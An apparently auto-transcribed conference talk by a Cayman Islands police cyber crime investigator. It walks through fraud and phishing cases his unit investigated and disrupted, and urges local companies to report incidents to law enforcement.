John Watson - RCIPS Cyber Crime and Digital Forensic Unit

foreign everybody uh welcome to my talk um I'm the thing standing between you and lunch so you're either going to have an early lunch or a late one depending on how many questions you ask at the end um we detectives call that a hint as to how many questions you should actually be asking at the end eating in to your own time um as the introduction said uh I've moved from a round building in Cheltenham where there's five thousand people working on a daily basis with a team of about 70 to a very small team some of whom are sat in the front row today they were they were the ones whipping and hollering um thank you for the Applause you might not want to upload at the uh at the the end of this so I lead a small team we mostly do digital forensics but we also investigate cyber crime as it's committed across the island and for those of you who work with um are in companies you'll probably recognize that the weakest link to any um cyber security measure is the is the individual so I thought I'll show you a representation about what it's like when you're trying to tell somebody to not click the link I know it's easy for your mind to wander it often feels like that's what we do when we try to sell somebody to not click in the link their attention just goes monkey plays symbols in the head even the monkey eventually says listen to what you're being told so our day job is the extraction and Analysis of electronic devices the assisting the investigation of cyber-enabled crime so those are crimes that can be committed on the street um not necessarily just with a computer so frauds um that type of thing we assist the Cyber investigators with it uh we investigate cyber dependent crimes those are crimes that can only be committed by the use of a computer so that'd be hacking uh Etc um this is a marvelous machine we use for all our investigations this was purpose built designed by ourselves very high spec system it's a glorified gaming machine if you like because of the data processing we have to do it has to be high quality stuff we get our exhibits to come in through a chain of custody we have to ensure that the the chain of custody is correct um and these are just very quickly for those who weren't at the workshop yesterday um some of the software we use to extract data this one's from phones um we use Tableau devices which are read only because we need to ensure the uh the quality and the Integrity of the evidence foreign to go through investigations we've actually done so these are these were actual investigations uh hopefully with somebody from data protection in the audience hopefully I've redacted all the details um that are personalized so this came in from our colleagues in the Cayman Island Bureau of financial investigation so this particular victim thought he was on a trading platform ffxtrader.com he was told his account would reflect the Investments he had made um screenshots were provided which I'll show you um the website was in fact controlled by a fraudster and figures shown within user accounts corresponds to real world Investments so there was a lot of money going through this web page um and my colleagues from Cayman Islands Bureau of financial investigation Pacific followed where the cryptocurrency was going and I concentrated on the web page itself so this was the victim's screenshot showing the amount of money he'd invested in this company so that's a lot of money it's certainly a lot of money to me and this is one of the things he got um sent from them um showing the profit he had made that day which of course wasn't profit so what we do with that is we take the information that's given on there and investigate to see if we can find out who's responsible for this particular website Alex Larson PhD well that's pretty impressive isn't it he must be a good guy he's got a PhD although most people with PhD call themselves Dr Alex Larson rather than PhD so we looked to see if we could find anybody who is Alex Larson if online setting is just not going to achieve a great deal if you're putting Dr Alex Larson you get a lot of doctors all over the world so I didn't go on to use by the some of the tools that lamb was talking about yesterday simply because I have no idea who this person is and it would be really difficult to trace after them and follow through there seven New Gate Street however we did check up on its uh a premises where you can register your company at and that's it the telephone number itself we looked into and it's everybody has this telephone number used in various different frauds um I think it was an O2 number it was a mobile number this company FXX trading which is dealing in hundreds of thousands if not millions of stolen funds daily use a mobile phone highly unlikely and when I looked at the page cells itself uh the webpage sorry the page is pulling down stuff from tradingview.com basically that was live market feeds that the company were pretending with theirs in fact they were just bringing it down from another company another legitimate company uh these were the times and conditions so the company is registered in the Marshall Islands which is another offshore um Financial operation operated by Bond local Consulting from Bulgaria neither of these places a law enforcement friendly so there was little Point going after them uh I did a check at company's house with a company found this particular company as you can see it's been dissolved the the gentleman who was the director was Bulgarian he was born in 1958 and that was the only data I could get um and that was the the final notice um so the graduated for the company it's quite common before us does the register a company um and after the first year when they don't file reports then companies have strike them off um but the financial conduct Authority in London had already put out warnings about them so they were on the radar in the UK but they weren't here um oh so I've got to go back one the the basics of this was we we didn't get very far in finding out who the Cyber criminals behind it were so the alternative and what we do a lot of is disruption so I had the web page taken offline so nobody else could fall victim to this particular fraud um I think the financial Bureau managed to um get quite a lot the funds held and I think it's still going through the process of the victim getting that back but it's a long complex process because of where they were held so the next one um this was an email sent to government employees yes unfortunately even government employees click the link that's why I showed the Homer thing to begin with um so info facts at gov dot KY pertaining to come from an internal address in fact as you can see it's SSD multi-state um audio0485 which is what the person was asked to play was in fact an HTML link it wasn't it wasn't an MP3 um so I looked at the the HTML document um ignored a bit in blue that was that was highlighted an error it's about I want you to look at is a bit with the yellow box around it which is the the web page of the the link was going to go to generally speaking with this what I do is I copy and paste the URL put it into a browser and see what it actually is so I did that and got this which was just weird um this is a legitimate Microsoft site this is a legitimate Microsoft login so I had no choice but to click on the link itself to see where it was actually going to do um it wasn't on the government system before anybody starts to think it was uh it was on Cali I think I used it um but what I did when I was doing the password is I do I did a network capture at the same time so I captured the network traffic from the web page as I was putting the password in um and this is where it turned up so the reason it was sending me to Microsoft login page is it already got the data itself and had an immediate sending out so if you see the Top Line which one's a pointer so this oh sorry this top line here where it posted my password but then immediately brought up the Microsoft page and uh I hope you liked the password I used I'm not sure if the actors liked it too much um again there was very little we could do with this it was another and if you've been involved in any of these types of Investigation I wish that the pound for a dollar if for every time this was a GoDaddy registered namecheap held web page this one was as well they are very on law enforcement unfriendly so we can't send legal orders on them but my experience tends to be that they're not that good um hmm so this one this one with I this one really annoyed me you'll find out why in a moment so this was a company who were claiming to assist people who'd been victims of a Ponzi scheme so these people had already lost money to a Ponzi scheme I think this one was dolphin trust which been dealt with about the German authorities so people had lost had already lost tens of thousands of dollars in this and this company is saying oh by the way we can get you your money back and we won't charge you for it now once you registered with them you got this second email which came was supposed to come from the fraud desk investigation department of the royal Cayman Islands police force we are not a police force we are a police service attached is a place to order for refund and this is what was attached uses our badge signed by my commissioner thinks that that's not your signature and it states that the the money was being held in a an account in the Cayman National Bank um obviously it's not an actual account um when I spoke to the people involved um about the victims who'd gone a little bit further in them the the company says that okay so we're going to charge you about ten thousand for us to access this Cayman National Bank funds once we've got the ten thousand we'll return it to you um together with the money that you lost in the dolphin um dolphin which one was this there's two of them uh yes sorry um and I knew we'd seen this one before and there was another one now this claimed to be for the rofx scam again that was another Ponzi scheme where people had lost money these criminals are talking to people who've already lost money and they were making quite a lot of money about from it so again we disrupted them and took the web page offline so there was no day I was gonna fall victim to this foreign [Music] signature but I've seen it often enough to know it wasn't um the people involved um in this and we got all the names they've got all the details um just no Trace number whatsoever the company wasn't registered anywhere despite the fact it says that it also actually had a YouTube um page where there was all these nice Souls on there saying oh this is a great company except another actually mentioned them by name there was people who worked for them saying oh we're really good we're really brilliant at what we do um and then there was people who said oh I've used this company they were all Australian for some reason I could use this company and I got all this money back and they were really great but they never actually mentioned this company by name so they were fraudulently put in reviews on YouTube for people to think well this is a legitimate company if I was also taken offline this is the one I've dealt with most recently um sorry go back to these so this was the related to that FFF Global and again the used um a mobile phone there's a contact details I do phone these numbers up and it's nobody ever answers um miter passage North Greenwich is actually a really poor premises and a contact with them but they didn't have a company registered at their address I was really shocked and surprised uh so this one is a little bit one of the more technical ones we did again it was a phishing email that came into government addresses studio um.com um the good news was if you know to understand what these terminology means three or two means that it didn't get there so I was quite relaxed already because the the web page didn't open in fact when you go on to it it says straight away that it was that it was closed this is a screenshot of the investigation we did where we took the um the host of the past one of the people who'd open the email we took the host put it onto a forensic system and downloaded it so I can find the actual email that was sent to the person um and from the email I can find the malicious link or the malicious file uh the the reason we do that is to see what it does so I initially um in Linux just carted it to see where it was um it's JavaScript another knock knock joke about JavaScript but we'll probably leave the jokes for another time um not the easy thing to reverse Engineers it didn't bother a great deal the interesting thing for me was this part here so the first thing it was bringing down was a version of jQuery 1.9.1 I think jQuery is about 3.8.7 now so the actors were using such old script that they had to pull down an older version of jQuery to make the damn thing work and in fact it didn't work anyway the reason it didn't work is the JavaScript was was was um was not enabled properly code the error code it relates to VBS script um and I think it was 2019 Microsoft banned VBS script from its systems so it was never going to work it was um a close Escape but it shows you the The Perils of being involved in these type of things are just going to catch up with my notes oh so that's the types of Investigations we do because that's the type of crime we pick up on that's the type of crime that's reported to us I'm going to talk more about that in a moment and somebody asked Laura earlier about how many data breaches have been reported to the Ombudsman I can tell you how many have been reported to us and that's zero I know some I know that happened because I've read about them on the ombudsman's report but nobody ever reports on to us I don't know why them so the world economic Forum has recently published it's 2023 risks at number eight in the next two years and in the next 10 years widespread cyber crime and cyber security are non-risks they're anticipated risks this is not some group who have got no idea what they're talking about this is a world economic Forum one of the most senior people in the in in the world determine what risks there are unsurprisingly in 10 years most of the bigger risks related to climate change what they said about cyber crime was alongside the Horizon cyber crime so it's going to happen attempts to disrupt critical technology-enabled resources and services will become more common quite a few risk threat companies are saying for this year and probably next year we're going to see an increase a decrease in in ransomware attacks but an increase in really serious attacks designed to take down your infrastructure completely um technology risks are not solely limited to Rogue actors sophisticated analysis of larger data sets will enable the misuse of personal information so they're talking about the threat from soluble criminals they're also talking about Insider threats that's the thing that's going to be a threat in two years and in ten years we are almost uh war with cyber criminals and if anybody's ever had any military training you probably recognize the center of gravity it's been around since the 18th century um one of the best and most influential journals of all time said it's the Hub of all power and movement on which everything depends so this talk is about looking at how the cyber security community of Cayman can work with law enforcement so it refers to those sources of strength and balance it is that characteristic capability or locality from which the force derives at Freedom of action physical strength although it will to fight it's a common practice in the military to say that the easiest way to take down an enemy is to take down the center of gravity and so the military tried to do that but they also tried to protect their own center of gravity so if we look at this in relation to cyber criminals what characteristics do they have well the very money orientated and they really don't give a about who the Target and for what um if you think some of the some of the jobs I dealt with I dealt with or investigated when Hackney comes so we're ransomware then they were taken completely offline in the middle of the pandemic the effect on them and the community was huge cyber criminals didn't give Adam about that all he wanted was the money that's what characterizes them that's what they do capability well that's huge um they can get into most if not any infrastructure if they're determined to do so the locality the worldwide which for law enforcement makes it really difficult because it's quite difficult for us to track them down if they're in law enforcement on law enforcement unfriendly countries where to fight they've absolutely got a wealthy fight and the reason for that is they're making a lot of money and they'll continue to make a lot of money so protection starts with the idea of attacking the enemy center of gravity while protecting your own there's three phases to it critical capabilities what are cyber criminal capabilities we just discussed that what are requirements what resources do they need but they've all must get limited resources now and the reason for that is because the amount of money they can get and the amount of money they can pay to people and the amount of infrastructure they can get so the FBI run the thing called ic3 which is internet Center for cyber crime I think but they report figures so this is for the last five years and then obviously 2022 been the last one so this is the losses that have been reported to ICC and as I talked about earlier we all know there's a huge amount of Under reporting so I think this figure is nowhere near what the actual figure is not even close the interesting thing for me was the the number of complaints has actually dropped but the volumes have increased significantly the most costly one you'd be unsurprised to hear was um BEC business email compromise that was 2.7 billion in 2022 and critical vulnerabilities what are cyber criminals vulnerabilities those aspects are components of critical requirements are deficient or vulnerable to attack or indirect attack I'm not sure they've got that many to be honest with you um when I worked for the ncsc we did take down a lot of infrastructure we took down trickbot twice I think and it still came back um because they're not that vulnerable and and we are not allowed to attack them technically so what's my team's center of gravity so we have the ability to disrupt to protect the community I think most people in here probably from companies that'll probably get really good cyber security you've got really good infrastructure behind you and a lot of people the people out there the people who are losing money don't and it's my job to protect them as best we can so we do disrupt where we find I think from memory I think we took down 25 fake wealth management websites last year I think it was up at 25. um we have the resources and capacity to disrupt and as I said have done so quite successfully so far critical vulnerabilities intelligence is our critical vulnerability we don't know what's happening out there because no one tells us no one says by the way John we had this fishing attack this is what we did about it I don't know is it reputational damage or it's just no cyber crime happening on this island at all I would like to think it's a second I think it's more the first as I've shown we can take these websites down in fact if you've got enough money you can subscribe to a company called Netcraft and they'll do what I do for you because it is time consuming it does take a while um what I can get done quite quickly now is when we get some fishing links and I can normally get that page flagged as malicious quite quickly and then work to get it taken down a little bit later so the visual representation of w